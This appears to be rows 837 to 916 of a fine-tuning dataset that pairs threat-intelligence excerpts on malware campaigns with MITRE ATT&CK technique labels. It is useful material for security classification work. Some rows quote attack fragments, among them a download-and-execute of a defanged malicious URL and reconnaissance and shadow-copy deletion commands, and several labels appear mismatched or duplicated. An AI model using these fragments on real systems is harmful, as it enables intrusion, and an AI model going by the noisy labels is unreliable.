| 837 | Thursday, April 16, 2020 . PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors . News summary . - Azerbaijan government and energy sector likely targeted by an unknown actor. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. Afterward, it copies 7,074,638 bytes from the end of the file and writes the remaining bytes back to the disk. One, called "frown.py," is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. For each FTP usage, the credentials are provided by the C2 server during the request. Start routine The communication between the scripts is done via a file called "Abibliophobia23" Commands and results are written into the file using a custom encryption scheme. The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the "Paths" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration. Additional tools . During our investigation, we identified a couple of additional tools mainly in Python and compiled for Windows: - Klog.exe: A keylogger using an output file called "System32.Log. Tre.py": A script used to create the file with the files/directories tree | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 838 | This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document — судалгаа.doc (research.doc) — was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 839 | Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. If the victim’s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones | ['T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1018 - Remote System Discovery'] | fine_tune |
| 840 | The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators | ['T1553.002 - Code Signing'] | fine_tune |
| 841 | TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 842 | Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim’s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker’s server, not in a file on the victim’s endpoint. 7) Finally, TrickBot’s financial module replaces the original response that would normally come from the bank with the C2’s response, and the injected page is displayed on the victim’s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot’s Server Side Web-Injects — Top Level Flow. Figure 5: TrickBot and Dyre both use “sourcelink” and “sourcequery” for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters | ['T1185 - Browser Session Hijacking'] | fine_tune |
| 843 | No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks | ['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 844 | The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 845 | The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user’s consent via the following dialog box in Figure 3 | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 846 | the malicious DLL installed as a Print Processor) is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6 | ['T1547.012 - Boot or Logon Autostart Execution: Print Processors'] | fine_tune |
| 847 | More specifically, Ramsay looks for any of two given encoded Hardware Profile GUIDs. One of these GUIDs is hardcoded as shown in Figure 14, while the other is dynamically generated based on the compromised victim’s machine. If any of the subject identifiers are found, parsing for a command signature will be attempted | ['T1082 - System Information Discovery'] | fine_tune |
| 848 | Then, it drops C:\Users\Public\x.vbs. Then it drops, C:\Users\Public\Natso.bat. Then, it executes `Natso.bat`, which is a "fileless" UAC bypass found by James Forshaw. If C:\Windows\Finex still doesn't exist (which means the UAC bypass failed), it will update the Nasto.bat and execute it using the code shown below. This is another UAC bypass technique based on fodhelper.exe. On our test machine, the last bypass was successful, and `C:\Windows\Finex` was successfully created. After that, the DLL deletes the dropped file and exits | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 849 | To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable | ['T1574.007 - Path Interception by PATH Environment Variable'] | fine_tune |
| 850 | As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos | ['T1573.001 - Symmetric Cryptography', 'T1059.004 - Command and Scripting Interpreter: Bash'] | fine_tune |
| 851 | Turla has many names in the information security industry — it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. In some operations, they also do not directly communicate to the C2 server. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them | ['T1584.004 - Server'] | fine_tune |
| 852 | Create processes - Write responses from the control server to a file - Send information for all drives - Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00* - Change the time of a file as specified by the control server | ['T1070.006 - Indicator Removal on Host: Timestomp'] | fine_tune |
| 853 | Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server | ['T1059.004 - Command and Scripting Interpreter: Bash'] | fine_tune |
| 854 | Finally, the command: system_profiler SPHardwareDataType 2>/dev/null || awk ‘/Boot ROM Version/ {split($0, line, “:”);printf(“%s”, line[2]);} checks if the machine is one of the following: “MBP”, “MBA”, “MB”, “MM”, “IM”, “MP” and “XS”. These codes represent the model of the system. For instance, “MBP” stands for MacBook Pro, “MBA” stands for MacBook Air and so on | ['T1497.001 - Virtualization/Sandbox Evasion: System Checks'] | fine_tune |
| 855 | Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap | ['T1140 - Deobfuscate/Decode Files or Information', 'T1574.013 - KernelCallbackTable', 'T1620 - Reflective Code Loading'] | fine_tune |
| 856 | X-Session: 0"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 857 | WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 858 | This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity | ['T1205 - Traffic Signaling'] | fine_tune |
| 859 | The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors’ job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. According to our analysis of this cache of data this site was compromised to host code on 7/9/2020 | ['T1584.001 - Domains'] | fine_tune |
| 860 | More interesting however is it that it also contains support for windows execution via smb shares and IPC. The sample also has a Windows version of the malware embedded inside that it can install on remote windows shares and then execute as a service | ['T1021.002 - Remote Services: SMB/Windows Admin Shares'] | fine_tune |
| 861 | One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader’s version | ['T1082 - System Information Discovery'] | fine_tune |
| 862 | It drops ransom notes at various folders in the system and opens one after it has encrypted the data and documents of the victim. As with usual ransomware, it does this to extort money from the victim in exchange for the decryption of their files | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 863 | Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function – this method is used much less frequently than the obvious Document_Open or the AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 864 | Establish persistence for itself on the endpoint - Establish persistence of another component of the malware on the endpoint - Update itself on endpoint after a separate updater component downloads the update from the control server | ['T1070.004 - Indicator Removal on Host: File Deletion', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 865 | Regularly, the service checks if a user is logged, by checking if Explorer is running. Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe | ['T1057 - Process Discovery'] | fine_tune |
| 866 | The sample collects the user information including current processes, installed software, system language and time zone. The harvested credentials and user information are then sent back to the C2. Here are some highlights about system information stealing | ['T1124 - System Time Discovery'] | fine_tune |
| 867 | Passgrabber module – collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 868 | The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication | ['T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL'] | fine_tune |
| 869 | The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we’ve seen communicate via HTTPS and WebDav with the same server “cloudme.com”, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Linköping, Sweden | ['T1102 - Web Service'] | fine_tune |
| 870 | These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered—one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22 | ['T1132.001 - Data Encoding: Standard Encoding', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 871 | Gather all network configuration information and record to a file on disk in a folder created by the implant using the command: cmd.exe /c ipconfig/all >>"%s" & arp -a >>"%s" where %s = <file_path | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 872 | The overwritten code reads the ransom note string inside the MBR and sets it to appear on the display | ['T1542.003 - Bootkit'] | fine_tune |
| 873 | Consent - Details - [#IABV2SETTINGS#] - About This website uses cookies . We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest [x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email. Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available for everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 874 | Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three API’s return values is modified by a system monitoring solution, like a sandbox | ['T1124 - System Time Discovery'] | fine_tune |
| 875 | Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 876 | CTU analysis of one of GOLD KINGSWOOD's campaign using SpicyOmelette (DOC2018.js) exposed additional sophisticated methods to compromise targets. A valid digital certificate was used to sign the malicious script. Windows Scripting Host supports the inclusion of digital signatures, and Figure 2 shows how the signature was appended to the script | ['T1553.002 - Code Signing'] | fine_tune |
| 877 | There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 878 | Historically, the group has employed the use of a series of phishing origin points, abusing access first at one university and then another | ['T1583.001 - Domains'] | fine_tune |
| 879 | After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3 | ['T1482 - Domain Trust Discovery'] | fine_tune |
| 880 | Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 881 | In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\ partition by overwriting it with fixed data. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable. As a result, there were additional stages and additional payloads that could inflict more damage to end systems | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 882 | This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies | ['T1585.002 - Email Accounts'] | fine_tune |
| 883 | This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon’s operators | ['T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 884 | The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns | ['T1584.004 - Server'] | fine_tune |
| 885 | APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement | ['T1505.003 - Server Software Component: Web Shell'] | fine_tune |
| 886 | Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The "Blackwater.bas" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 887 | Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives | ['T1080 - Taint Shared Content'] | fine_tune |
| 888 | These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware | ['T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1007 - System Service Discovery'] | fine_tune |
| 889 | 1) Moving the (malicious) application into the /Users/user/Library/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest | ['T1036 - Masquerading'] | fine_tune |
| 890 | TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware — threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 891 | The Autorun manager subsystem is responsible for tracking the way that the malicious module starts in the system and it maintains several different methods for starting automatically (shown below): LinkAutorun The subsystem searches for a LNK file in the target directory, changes the path to “cmd.exe” and the description to ‘ /q /c start “” “%s” && start “” “%s” ‘ TaskScheduler20Autorun The subsystem creates the ITaskService (works only on Windows Vista+) and uses the ITaskService interface to create a new task with a logon trigger StartupAutorun The subsystem creates a LNK file in %STARTUP% ScreenSaverAutorun The subsystem installs as a current screensaver with a hidden window HiddenTaskAutorun The subsystem creates the task ITaskScheduler (works only on pre-Vista NT). The task trigger start date is set to the creation date of the Windows directory ShellAutorun Winlogon registry [HKCUSoftwareMicrosoftWindows NTCurrentVersionWinlogon] Shell=”explorer.exe | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification'] | fine_tune |
| 892 | Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim’s machine. Execute the command | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 893 | 1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move latterly and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information | ['T1003 - OS Credential Dumping'] | fine_tune |
| 894 | In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 895 | The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2 | ['T1010 - Application Window Discovery'] | fine_tune |
| 896 | NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails | ['T1204.002 - User Execution: Malicious File', 'T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 897 | In order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 898 | One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros | ['T1566.001 - Phishing: Spearphishing Attachment', 'T1027 - Obfuscated Files or Information', 'T1204.002 - User Execution: Malicious File', 'T1221 - Template Injection'] | fine_tune |
| 899 | First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration | ['T1573.001 - Symmetric Cryptography', 'T1546.015 - Event Triggered Execution: Component Object Model Hijacking'] | fine_tune |
| 900 | Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC | ['T1207 - Rogue Domain Controller'] | fine_tune |
| 901 | The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another’s process token just for the execution of a command | ['T1134.002 - Create Process with Token'] | fine_tune |
| 902 | Then, it reads the dropped file with the .db3 extension, which contains position-independent code, and uses CreateThread to execute its content | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 903 | The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan’s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 904 | Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports | ['T1071.001 - Application Layer Protocol: Web Protocols', 'T1095 - Non-Application Layer Protocol'] | fine_tune |
| 905 | Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 906 | DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id | ['T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1047 - Windows Management Instrumentation', 'T1047 - Windows Management Instrumentation'] | fine_tune |
| 907 | In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the "net start %s" argument (without quotes), where "%s" is the service name | ['T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 908 | The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration | ['T1049 - System Network Connections Discovery'] | fine_tune |
| 909 | FireEye Research Labs, the intelligence behind our Mandiant Consultancy services, identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 910 | In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 911 | One of the file path name combinations observed was ‘C:\ProgramData\Dacr\macrse.exe’, also configured in a Crimson “Main Client” sample and used for saving the payload received from the C2 when invoking the usbwrm command | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 912 | In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running. This is followed by a number of Linux shell command style commands related to the malware establishing persistence | ['T1082 - System Information Discovery'] | fine_tune |
| 913 | Command Number – a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID – can be one of the following commands: 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument. 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 914 | Also, on some infected computers we found a tool called the Winexesvc tool. The main difference is that the Winexesvc tool enables the execution of remote commands from Linux-based operating system. When the Linux binary “winexe” is run against a Windows server, the winexesvc.exe executable is created and installed as a service | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 915 | CertPKIProvider.dll, tracked by Microsoft as “VaporRage” can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 916 | On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads | ['T1583.006 - Web Services', 'T1102 - Web Service', 'T1608.001 - Upload Malware'] | fine_tune |
